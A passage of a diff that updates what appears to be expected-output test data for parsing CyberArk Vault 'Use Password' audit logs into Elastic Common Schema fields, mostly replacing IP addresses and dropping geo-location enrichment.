Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003efun and profit\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:12\",\"IsoTimestamp\":\"2021-03-11T17:38:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"fun and profit\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -208,20 +199,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -244,7 +226,7 @@ }, "@timestamp": "2021-03-11T17:46:49.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -256,8 +238,8 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { @@ -265,20 +247,20 @@ "severity": "Info", "reason": "FOR FUN.", "iso_timestamp": "2021-03-11T17:46:49Z", - "gateway_station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:46:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:46:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eFOR FUN.\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:46:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:46:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eFOR FUN.\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "127.0.0.1", "action": "Use Password", @@ -292,8 +274,8 @@ "event": { "severity": 2, "reason": "FOR FUN.", - "ingested": "2021-06-09T10:24:32.348994500Z", - "original": "\u003c5\u003e1 2021-03-11T17:46:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eFOR FUN.\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:49\",\"IsoTimestamp\":\"2021-03-11T17:46:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"FOR FUN.\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"81.32.170.205\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374498300Z", + "original": "\u003c5\u003e1 2021-03-11T17:46:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eFOR FUN.\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:49\",\"IsoTimestamp\":\"2021-03-11T17:46:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"FOR FUN.\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -316,20 +298,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -352,7 +325,7 @@ }, "@timestamp": "2021-03-11T17:48:27.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -364,8 +337,8 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { @@ -373,20 +346,20 @@ "severity": "Info", "reason": "For fun and profit", "iso_timestamp": "2021-03-11T17:48:27Z", - "gateway_station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eFor fun and profit\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eFor fun and profit\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "10.0.2.2", "action": "Use Password", @@ -400,8 +373,8 @@ "event": { "severity": 2, "reason": "For fun and profit", - "ingested": "2021-06-09T10:24:32.348997400Z", - "original": "\u003c5\u003e1 2021-03-11T17:48:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eFor fun and profit\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:27\",\"IsoTimestamp\":\"2021-03-11T17:48:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"For fun and profit\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"81.32.170.205\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374504300Z", + "original": "\u003c5\u003e1 2021-03-11T17:48:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eFor fun and profit\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:27\",\"IsoTimestamp\":\"2021-03-11T17:48:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"For fun and profit\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -424,20 +397,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - 